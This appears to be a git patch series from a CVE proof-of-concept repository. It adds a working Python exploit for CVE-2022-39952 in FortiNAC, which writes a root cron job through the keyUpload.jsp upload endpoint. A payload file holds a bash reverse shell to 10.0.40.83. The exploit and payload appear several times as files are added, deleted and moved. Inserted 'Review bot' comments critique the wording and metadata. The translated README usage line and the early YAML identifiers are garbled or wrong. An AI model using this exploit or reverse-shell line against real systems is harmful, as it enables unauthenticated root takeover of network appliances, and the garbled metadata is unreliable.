From ca454f5783b24af4cf2c602c608c9f212250897e Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Thu, 9 Mar 2023 15:13:58 +0000 Subject: [PATCH 01/19] =?UTF-8?q?=E6=B7=BB=E5=8A=A0=E4=BA=86CVE-2022-39952?= =?UTF-8?q?=E7=9A=84poc.=202023=E5=B9=B42=E6=9C=8816=E6=97=A5=E6=98=9F?= =?UTF-8?q?=E6=9C=9F=E5=9B=9B=EF=BC=8CFortinet=E5=8F=91=E5=B8=83=E4=BA=86?= =?UTF-8?q?=E4=B8=80=E4=BB=BDPSIRT=EF=BC=8C=E8=AF=A6=E7=BB=86=E8=AF=B4?= =?UTF-8?q?=E6=98=8E=E4=BA=86CVE-2022-39952=EF=BC=8C=E8=BF=99=E6=98=AF?= =?UTF-8?q?=E4=B8=80=E4=B8=AA=E5=BD=B1=E5=93=8D=E5=85=B6FortiNAC=E4=BA=A7?= =?UTF-8?q?=E5=93=81=E7=9A=84=E5=85=B3=E9=94=AE=E6=BC=8F=E6=B4=9E=E3=80=82?= =?UTF-8?q?Fortinet=E7=9A=84Gwendal=20Gu=C3=A9gniaud=E5=8F=91=E7=8E=B0?= =?UTF-8?q?=E4=BA=86=E6=AD=A4=E6=BC=8F=E6=B4=9E=EF=BC=8C=E5=85=81=E8=AE=B8?= =?UTF-8?q?=E6=9C=AA=E7=BB=8F=E8=BA=AB=E4=BB=BD=E9=AA=8C=E8=AF=81=E7=9A=84?= =?UTF-8?q?=E6=94=BB=E5=87=BB=E8=80=85=E5=9C=A8=E7=B3=BB=E7=BB=9F=E4=B8=8A?= =?UTF-8?q?=E5=86=99=E5=85=A5=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=EF=BC=8C?= =?UTF-8?q?=E4=BB=8E=E8=80=8C=E5=9C=A8=E6=A0=B9=E7=94=A8=E6=88=B7=E7=9A=84?= =?UTF-8?q?=E4=B8=8A=E4=B8=8B=E6=96=87=E4=B8=AD=E6=89=A7=E8=A1=8C=E8=BF=9C?= =?UTF-8?q?=E7=A8=8B=E4=BB=A3=E7=A0=81=E3=80=82=E6=AD=A4=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?=E7=94=B1=20Fortinet=20=E7=9A=84=20Gwendal=20Gu=C3=A9gniaud=20?= =?UTF-8?q?=E5=8F=91=E7=8E=B0=EF=BC=8C=E5=85=81=E8=AE=B8=E6=9C=AA=E7=BB=8F?= =?UTF-8?q?=E8=BA=AB=E4=BB=BD=E9=AA=8C=E8=AF=81=E7=9A=84=E6=94=BB=E5=87=BB?= =?UTF-8?q?=E8=80=85=E5=9C=A8=E7=B3=BB=E7=BB=9F=E4=B8=8A=E5=86=99=E5=85=A5?= =?UTF-8?q?=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=EF=BC=8C=E4=BB=8E=E8=80=8C?= =?UTF-8?q?=E5=9C=A8=E6=A0=B9=E7=94=A8=E6=88=B7=E7=9A=84=E4=B8=8A=E4=B8=8B?= =?UTF-8?q?=E6=96=87=E4=B8=AD=E8=8E=B7=E5=8F=96=E8=BF=9C=E7=A8=8B=E4=BB=A3?= =?UTF-8?q?=E7=A0=81=E6=89=A7=E8=A1=8C=EF=BC=8C=E4=BB=BB=E6=84=8F=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E5=86=99=E5=85=A5=E6=BC=8F=E6=B4=9E=E5=8F=AF=E9=80=9A?= =?UTF-8?q?=E8=BF=87=E5=A4=9A=E7=A7=8D=E6=96=B9=E5=BC=8F=E8=A2=AB=E6=BB=A5?= 
=?UTF-8?q?=E7=94=A8=EF=BC=8C=E4=BB=A5=E8=8E=B7=E5=8F=96=E8=BF=9C=E7=A8=8B?= =?UTF-8?q?=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E3=80=82?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- debian/CVE-2022-39952.py | 29 +++++++++++++++++++++++++++++ debian/payload | 1 + 2 files changed, 30 insertions(+) create mode 100644 debian/CVE-2022-39952.py create mode 100644 debian/payload
diff --git a/debian/CVE-2022-39952.py b/debian/CVE-2022-39952.py
new file mode 100644
index 00000000..b5cd9247
--- /dev/null
+++ b/debian/CVE-2022-39952.py
@@ -0,0 +1,29 @@
+#!/usr/bin/python3
+import argparse
+import requests
+import zipfile
+import urllib3
+urllib3.disable_warnings()
+
+
+def exploit(target):
+ url = f'https://{target}:8443/configWizard/keyUpload.jsp'
+ r = requests.post(url, files={'key': open('payload.zip', 'rb')}, verify=False)
+ if 'SuccessfulUpload' in r.text:
+ print(f'[+] Payload successfully delivered')
+
+def make_zip(payload_file):
+ fullpath = '/etc/cron.d/payload'
+ zf = zipfile.ZipFile('payload.zip', 'w')
+ zf.write(payload_file, fullpath)
+ zf.close()
+ print(f'[+] Wrote {payload_file} to {fullpath}')
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser()
+ parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
+ parser.add_argument('-f', '--file', help='The cronjob payload file', required=True)
+ args = parser.parse_args()
+
+ make_zip(args.file)
+ exploit(args.target)
diff --git a/debian/payload b/debian/payload
new file mode 100644
index 00000000..9c773e16
--- /dev/null
+++ b/debian/payload
@@ -0,0 +1 @@
+* * * * * root bash -i >& /dev/tcp/10.0.40.83/443 0>&1
-- Gitee From 5221103c12b5b1d631e925494b201746b54eb6a4 Mon Sep 17 00:00:00 2001 
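Review bot: The status line at the end of `make_zip()` in `debian/CVE-2022-39952.py` (PATCH 01) prints `Wrote {payload_file} to {fullpath}`, but at that point the code has only created a local `payload.zip`; nothing has been written to `/etc/cron.d/payload`, and `zipfile` stores the member name without its leading slash. Wording such as `print(f'[+] Added {payload_file} to payload.zip')` would match what the function actually does. The file also has no docstring: one that records the visible behaviour, namely an HTTPS POST of multipart field `key` to `/configWizard/keyUpload.jsp` on port 8443 with certificate checks skipped by `verify=False`, would tell a reader triaging appliance web logs which request this entry corresponds to. The identical file is added again under `cve/fortinac/CVE-2022-39952/` in PATCH 06, and both points apply there.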
From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 09:51:26 +0000 Subject: [PATCH 02/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20de?= =?UTF-8?q?bian/CVE-2022-39952.py?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- debian/CVE-2022-39952.py | 29 ----------------------------- 1 file changed, 29 deletions(-) delete mode 100644 debian/CVE-2022-39952.py diff --git a/debian/CVE-2022-39952.py b/debian/CVE-2022-39952.py deleted file mode 100644 index b5cd9247..00000000 --- a/debian/CVE-2022-39952.py +++ /dev/null @@ -1,29 +0,0 @@ -#!/usr/bin/python3 -import argparse -import requests -import zipfile -import urllib3 -urllib3.disable_warnings() - - -def exploit(target): - url = f'https://{target}:8443/configWizard/keyUpload.jsp' - r = requests.post(url, files={'key': open('payload.zip', 'rb')}, verify=False) - if 'SuccessfulUpload' in r.text: - print(f'[+] Payload successfully delivered') - -def make_zip(payload_file): - fullpath = '/etc/cron.d/payload' - zf = zipfile.ZipFile('payload.zip', 'w') - zf.write(payload_file, fullpath) - zf.close() - print(f'[+] Wrote {payload_file} to {fullpath}') - -if __name__ == "__main__": - parser = argparse.ArgumentParser() - parser.add_argument('-t', '--target', help='The IP address of the target', required=True) - parser.add_argument('-f', '--file', help='The cronjob payload file', required=True) - args = parser.parse_args() - - make_zip(args.file) - exploit(args.target) -- Gitee From c8e729e0304584f92d6ff843b369f88d1a7ffdfa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 09:51:35 +0000 Subject: [PATCH 03/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20de?= =?UTF-8?q?bian/payload?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- debian/payload | 1 - 1 file changed, 1 deletion(-) delete mode 100644 debian/payload 
diff --git a/debian/payload b/debian/payload deleted file mode 100644 index 9c773e16..00000000 --- a/debian/payload +++ /dev/null @@ -1 +0,0 @@ -* * * * * root bash -i >& /dev/tcp/10.0.40.83/443 0>&1 -- Gitee From 1d0fb0bee97fdd1555b57ed2db7e2eebcd242880 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 09:52:47 +0000 Subject: [PATCH 04/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20fortinac?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/fortinac/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/fortinac/.keep diff --git a/cve/fortinac/.keep b/cve/fortinac/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 7af16ebc131b56d6ab1751b2b764a6c45bf72fb7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 09:54:18 +0000 Subject: [PATCH 05/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-39952?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/fortinac/CVE-2022-39952/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/fortinac/CVE-2022-39952/.keep diff --git a/cve/fortinac/CVE-2022-39952/.keep b/cve/fortinac/CVE-2022-39952/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From d5005766b923a77855bc2570b48028b81b00d641 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 10:03:11 +0000 Subject: [PATCH 06/19] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-39952=E7=9A=84?= =?UTF-8?q?poc=20CVE-2022-39952=E7=9A=84=E7=9B=B8=E5=85=B3poc?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 2023年2月16日星期四,Fortinet发布了一份PSIRT,详细说明了CVE-2022-39952,这是一个影响其FortiNAC产品的关键漏洞。Fortinet的Gwendal Guégniaud发现了此漏洞,允许未经身份验证的攻击者在系统上写入任意文件,从而在根用户的上下文中执行远程代码。本次PR添加了该漏洞相关的poc 
Signed-off-by: 冉沛筠 --- cve/fortinac/CVE-2022-39952/CVE-2022-39952.py | 29 ++++++++++++ cve/fortinac/CVE-2022-39952/README.md | 45 +++++++++++++++++++ cve/fortinac/CVE-2022-39952/payload | 1 + 3 files changed, 75 insertions(+) create mode 100644 cve/fortinac/CVE-2022-39952/CVE-2022-39952.py create mode 100644 cve/fortinac/CVE-2022-39952/README.md create mode 100644 cve/fortinac/CVE-2022-39952/payload
diff --git a/cve/fortinac/CVE-2022-39952/CVE-2022-39952.py b/cve/fortinac/CVE-2022-39952/CVE-2022-39952.py
new file mode 100644
index 00000000..b5cd9247
--- /dev/null
+++ b/cve/fortinac/CVE-2022-39952/CVE-2022-39952.py
@@ -0,0 +1,29 @@
+#!/usr/bin/python3
+import argparse
+import requests
+import zipfile
+import urllib3
+urllib3.disable_warnings()
+
+
+def exploit(target):
+ url = f'https://{target}:8443/configWizard/keyUpload.jsp'
+ r = requests.post(url, files={'key': open('payload.zip', 'rb')}, verify=False)
+ if 'SuccessfulUpload' in r.text:
+ print(f'[+] Payload successfully delivered')
+
+def make_zip(payload_file):
+ fullpath = '/etc/cron.d/payload'
+ zf = zipfile.ZipFile('payload.zip', 'w')
+ zf.write(payload_file, fullpath)
+ zf.close()
+ print(f'[+] Wrote {payload_file} to {fullpath}')
+
+if __name__ == "__main__":
+ parser = argparse.ArgumentParser()
+ parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
+ parser.add_argument('-f', '--file', help='The cronjob payload file', required=True)
+ args = parser.parse_args()
+
+ make_zip(args.file)
+ exploit(args.target)
diff --git a/cve/fortinac/CVE-2022-39952/README.md b/cve/fortinac/CVE-2022-39952/README.md
new file mode 100644
index 00000000..a8c77c69
--- /dev/null
+++ b/cve/fortinac/CVE-2022-39952/README.md 
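Review bot: The `argparse` block at the bottom of `CVE-2022-39952.py` defines `-t/--target` and `-f/--file`, yet the usage block in the `README.md` added by this same patch shows `CVE-2022-39952py--目标10.0.40.85--文件负载`, so the translated README has lost the `.py` dot, the spaces and the real flag names. The console output quoted there (`[+]将负载写入/etc/cron.d/payload`) is translated as well and will not match what the script prints. Command lines and program output inside the fenced block should be left untranslated; only the surrounding prose needs translating.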
@@ -0,0 +1,45 @@
+#CVE-2022-39952
+
+CVE-2022-39952的POC影响Fortinet FortiNAC
+
+
+
+此漏洞的默认配置编写cron作业以创建
+
+反向外壳。确保更改“有效负载”文件以适合您的环境。
+
+
+
+##技术分析
+
+可以在我们的博客上找到漏洞和危害指标的技术根源分析:
+
+https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs
+
+
+
+##摘要
+
+这个POC滥用keyUpload.jsp端点来实现任意文件写入。
+
+
+
+##用途
+
+```明文
+
+root@kali:~/CVE-2022-39952#python3 CVE-2022-39952py--目标10.0.40.85--文件负载
+
+[+]将负载写入/etc/cron.d/payload
+
+[+]有效负载已成功传递
+
+```
+
+
+
+##解决措施
+
+按照PSIRT中的说明更新至最新版本
+
+https://www.fortiguard.com/psirt/FG-IR-22-300
\ No newline at end of file
diff --git a/cve/fortinac/CVE-2022-39952/payload b/cve/fortinac/CVE-2022-39952/payload
new file mode 100644
index 00000000..9c773e16
--- /dev/null
+++ b/cve/fortinac/CVE-2022-39952/payload
@@ -0,0 +1 @@
+* * * * * root bash -i >& /dev/tcp/10.0.40.83/443 0>&1
-- Gitee From 11a4a649c91c418585dddd4b77de7bf9e40fdfa8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 10:03:29 +0000 Subject: [PATCH 07/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/fortinac/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/fortinac/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/fortinac/.keep
diff --git a/cve/fortinac/.keep b/cve/fortinac/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee From b88e2e116e38f139ff2f34a412ebbd4639acbe94 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 10:03:48 +0000 Subject: [PATCH 08/19] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/fortinac/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/fortinac/yaml/.keep
diff --git a/cve/fortinac/yaml/.keep b/cve/fortinac/yaml/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee 
From 5542199e55332cbbbc999c7e531a457beec63502 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 10:07:16 +0000 Subject: [PATCH 09/19] add cve/fortinac/yaml/CVE-2022-39952. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- cve/fortinac/yaml/CVE-2022-39952.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/fortinac/yaml/CVE-2022-39952.yaml
diff --git a/cve/fortinac/yaml/CVE-2022-39952.yaml b/cve/fortinac/yaml/CVE-2022-39952.yaml
new file mode 100644
index 00000000..e69de29b
-- Gitee From 3b324ce1941bcff446471c1306ed2d7f7904ad72 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 10:17:11 +0000 Subject: [PATCH 10/19] update cve/fortinac/yaml/CVE-2022-39952.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- cve/fortinac/yaml/CVE-2022-39952.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+)
diff --git a/cve/fortinac/yaml/CVE-2022-39952.yaml b/cve/fortinac/yaml/CVE-2022-39952.yaml
index e69de29b..d224a5c1 100644
--- a/cve/fortinac/yaml/CVE-2022-39952.yaml
+++ b/cve/fortinac/yaml/CVE-2022-39952.yaml 
@@ -0,0 +1,26 @@
+id: CVE-2022-39952
+source: https://github.com/horizon3ai/CVE-2022-39952
+info:
+ name: FortiNAC是Fortinet的网络访问控制增强安全结构的解决方案可见性、控制和自动响应连接到网络的所有内容。FortiNAC提供针对物联网威胁的保护,将控制扩展到第三方设备,以及协调自动响应到广泛的一系列社交活动.
+ severity: critical
+ description: 此漏洞默认配置会写入cron作业以创建反转外壳m允许未经身份验证的攻击者在系统上写入任意文件,从而在根用户的上下文中执行远程代码
+ scope-of-influence:
+ FortiNAC version 9.4.0
+ FortiNAC version 9.2.0 through 9.2.5
+ FortiNAC version 9.1.0 through 9.1.7
+ FortiNAC 8.8 all versions
+ FortiNAC 8.7 all versions
+ FortiNAC 8.6 all versions
+ FortiNAC 8.5 all versions
+ FortiNAC 8.3 all versions
+ reference:
+ - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs
+ - https://www.fortiguard.com/psirt/FG-IR-22-300
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-0265
+ cwe-id: CWE-611
+ cnvd-id: None
+ kve-id: None
+ tags: cve, xxe
\ No newline at end of file
-- Gitee From 3b61c7e834180ef226b53a736869944295d11fc8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 10:17:34 +0000 Subject: [PATCH 11/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/fortinac/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/fortinac/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/fortinac/yaml/.keep
diff --git a/cve/fortinac/yaml/.keep b/cve/fortinac/yaml/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee From feefb09a757730934dbe1b7dd74fc34ecdcb7bff Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 10:38:50 +0000 Subject: [PATCH 12/19] update cve/fortinac/yaml/CVE-2022-39952.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- cve/fortinac/yaml/CVE-2022-39952.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) 
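Review bot: Under `scope-of-influence:` in the new `CVE-2022-39952.yaml` (PATCH 10) the affected versions are bare lines (`FortiNAC version 9.4.0`, …) while `reference:` just below uses `- ` items. Indentation is not recoverable from this view, but as plain lines they would either fold into one long string or fail to parse, and neither lets a tool match a single version range. Writing them as a sequence, e.g. `- FortiNAC version 9.2.0 through 9.2.5`, keeps one range per entry. `name:` also holds a product description of FortiNAC rather than a title for the vulnerability; a short title naming the flaw is what a reader scanning a list of entries needs.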
diff --git a/cve/fortinac/yaml/CVE-2022-39952.yaml b/cve/fortinac/yaml/CVE-2022-39952.yaml index d224a5c1..cb134a42 100644 --- a/cve/fortinac/yaml/CVE-2022-39952.yaml +++ b/cve/fortinac/yaml/CVE-2022-39952.yaml @@ -3,7 +3,7 @@ source: https://github.com/horizon3ai/CVE-2022-39952 info: name: FortiNAC是Fortinet的网络访问控制增强安全结构的解决方案可见性、控制和自动响应连接到网络的所有内容。FortiNAC提供针对物联网威胁的保护,将控制扩展到第三方设备,以及协调自动响应到广泛的一系列社交活动. severity: critical - description: 此漏洞默认配置会写入cron作业以创建反转外壳m允许未经身份验证的攻击者在系统上写入任意文件,从而在根用户的上下文中执行远程代码 + description: 该漏洞是由于FortiNAC keyUpload脚本中存在路径遍历漏洞,未经身份认证的远程攻击者可利用此漏洞向目标系统写入任意内容,最终可在目标系统上以 Root 权限执行任意代码。允许未经身份验证的攻击者在系统上写入任意文件,从而在根用户的上下文中执行远程代码 scope-of-influence: FortiNAC version 9.4.0 FortiNAC version 9.2.0 through 9.2.5 @@ -17,10 +17,10 @@ info: - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs - https://www.fortiguard.com/psirt/FG-IR-22-300 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:U/RC:C cvss-score: 9.8 - cve-id: CVE-2022-0265 - cwe-id: CWE-611 - cnvd-id: None + cve-id: CVE-2022-39952 + cwe-id: None + cnnvd-id: CNNVD-202302-1434 kve-id: None - tags: cve, xxe \ No newline at end of file + tags: 远程代码执行漏洞 \ No newline at end of file -- Gitee From e380543bfce9573dc3f891f20a3d7048f544804d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Fri, 10 Mar 2023 10:43:51 +0000 Subject: [PATCH 13/19] update cve/fortinac/yaml/CVE-2022-39952.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- cve/fortinac/yaml/CVE-2022-39952.yaml | 21 +++++++++++---------- 1 file changed, 11 insertions(+), 10 deletions(-) diff --git a/cve/fortinac/yaml/CVE-2022-39952.yaml b/cve/fortinac/yaml/CVE-2022-39952.yaml index cb134a42..b213bf79 100644 --- a/cve/fortinac/yaml/CVE-2022-39952.yaml +++ b/cve/fortinac/yaml/CVE-2022-39952.yaml 
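Review bot: In the second hunk of PATCH 12 (`@@ -17,10 +17,10 @@`), `tags:` goes from comma-separated tokens (`cve, xxe`) to a single free-text phrase, `远程代码执行漏洞`. If tags are used to filter or group entries (the schema is not visible here, so this is an assumption), a phrase will not match any other entry; keeping the token form, for example `tags: cve, rce`, would stay searchable. The value is not changed again by the later patches in this series.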
@@ -1,18 +1,19 @@ id: CVE-2022-39952 source: https://github.com/horizon3ai/CVE-2022-39952 info: - name: FortiNAC是Fortinet的网络访问控制增强安全结构的解决方案可见性、控制和自动响应连接到网络的所有内容。FortiNAC提供针对物联网威胁的保护,将控制扩展到第三方设备,以及协调自动响应到广泛的一系列社交活动. + name: FortiNAC是Fortinet的网络访问控制增强安全结构的解决方案可见性、控制和自动响应连接到网络的所有内容。FortiNAC提供针对物联网威胁的保护,将控制扩展到第三方设备,以及协调自动响应到广泛的一系列社交活动。 severity: critical - description: 该漏洞是由于FortiNAC keyUpload脚本中存在路径遍历漏洞,未经身份认证的远程攻击者可利用此漏洞向目标系统写入任意内容,最终可在目标系统上以 Root 权限执行任意代码。允许未经身份验证的攻击者在系统上写入任意文件,从而在根用户的上下文中执行远程代码 + description: | + 该漏洞是由于FortiNAC keyUpload脚本中存在路径遍历漏洞,未经身份认证的远程攻击者可利用此漏洞向目标系统写入任意内容,最终可在目标系统上以 Root 权限执行任意代码。 scope-of-influence: FortiNAC version 9.4.0 - FortiNAC version 9.2.0 through 9.2.5 - FortiNAC version 9.1.0 through 9.1.7 - FortiNAC 8.8 all versions - FortiNAC 8.7 all versions - FortiNAC 8.6 all versions - FortiNAC 8.5 all versions - FortiNAC 8.3 all versions + FortiNAC version 9.2.0 至 9.2.5 + FortiNAC version 9.1.0 至 9.1.7 + FortiNAC 8.8 所有版本 + FortiNAC 8.7 所有版本 + FortiNAC 8.6 所有版本 + FortiNAC 8.5 所有版本 + FortiNAC 8.3 所有版本 reference: - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs - https://www.fortiguard.com/psirt/FG-IR-22-300 @@ -20,7 +21,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:U/RC:C cvss-score: 9.8 cve-id: CVE-2022-39952 - cwe-id: None + cwe-id: CWE-21 cnnvd-id: CNNVD-202302-1434 kve-id: None tags: 远程代码执行漏洞 \ No newline at end of file -- Gitee From 47cea9c331bf2b3e0a6b38d5ae629682239417cf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Tue, 14 Mar 2023 01:55:59 +0000 Subject: [PATCH 14/19] update cve/fortinac/yaml/CVE-2022-39952.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- cve/fortinac/yaml/CVE-2022-39952.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cve/fortinac/yaml/CVE-2022-39952.yaml b/cve/fortinac/yaml/CVE-2022-39952.yaml index b213bf79..8c4efdf1 100644 
--- a/cve/fortinac/yaml/CVE-2022-39952.yaml +++ b/cve/fortinac/yaml/CVE-2022-39952.yaml @@ -17,11 +17,12 @@ info: reference: - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs - https://www.fortiguard.com/psirt/FG-IR-22-300 + - https://nvd.nist.gov/vuln/detail/CVE-2022-39952 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:U/RC:C cvss-score: 9.8 cve-id: CVE-2022-39952 - cwe-id: CWE-21 + cwe-id: CWE-610 cnnvd-id: CNNVD-202302-1434 kve-id: None tags: 远程代码执行漏洞 \ No newline at end of file -- Gitee From 7ab36efacf35686eb73a31406b25c968e1450c2f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Tue, 14 Mar 2023 01:57:51 +0000 Subject: [PATCH 15/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/fortinac/CVE-2022-39952/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/fortinac/CVE-2022-39952/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/fortinac/CVE-2022-39952/.keep diff --git a/cve/fortinac/CVE-2022-39952/.keep b/cve/fortinac/CVE-2022-39952/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 5e46448dfb6886ec81275c6692dd03c7b31bb5d6 Mon Sep 17 00:00:00 2001 
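Review bot: `cwe-id: CWE-610` in PATCH 14 is a broad class (externally controlled reference to a resource in another sphere); its child CWE-73, external control of file name or path, describes an arbitrary file write through an upload more precisely. The FG-IR-22-300 advisory already listed under `reference:` is worth checking for the vendor's own CWE, which I believe is CWE-73; if so, `cwe-id: CWE-73` would agree with the primary source. The field has already changed several times in this series (CWE-611, None, CWE-21, CWE-610), so a short YAML comment naming where the value was taken from would help the next editor.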
From: =?UTF-8?q?=E5=86=89=E6=B2=9B=E7=AD=A0?= Date: Tue, 14 Mar 2023 04:13:58 +0000 Subject: [PATCH 16/19] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/fortina?= =?UTF-8?q?c=20=E4=B8=BA=20cve/fortinac/2022?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/fortinac/{ => 2022}/CVE-2022-39952/CVE-2022-39952.py | 0 cve/fortinac/{ => 2022}/CVE-2022-39952/README.md | 0 cve/fortinac/{ => 2022}/CVE-2022-39952/payload | 0 cve/fortinac/{ => 2022}/yaml/CVE-2022-39952.yaml | 0 4 files changed, 0 insertions(+), 0 deletions(-) rename cve/fortinac/{ => 2022}/CVE-2022-39952/CVE-2022-39952.py (100%) rename cve/fortinac/{ => 2022}/CVE-2022-39952/README.md (100%) rename cve/fortinac/{ => 2022}/CVE-2022-39952/payload (100%) rename cve/fortinac/{ => 2022}/yaml/CVE-2022-39952.yaml (100%) diff --git a/cve/fortinac/CVE-2022-39952/CVE-2022-39952.py b/cve/fortinac/2022/CVE-2022-39952/CVE-2022-39952.py similarity index 100% rename from cve/fortinac/CVE-2022-39952/CVE-2022-39952.py rename to cve/fortinac/2022/CVE-2022-39952/CVE-2022-39952.py diff --git a/cve/fortinac/CVE-2022-39952/README.md b/cve/fortinac/2022/CVE-2022-39952/README.md similarity index 100% rename from cve/fortinac/CVE-2022-39952/README.md rename to cve/fortinac/2022/CVE-2022-39952/README.md diff --git a/cve/fortinac/CVE-2022-39952/payload b/cve/fortinac/2022/CVE-2022-39952/payload similarity index 100% rename from cve/fortinac/CVE-2022-39952/payload rename to cve/fortinac/2022/CVE-2022-39952/payload diff --git 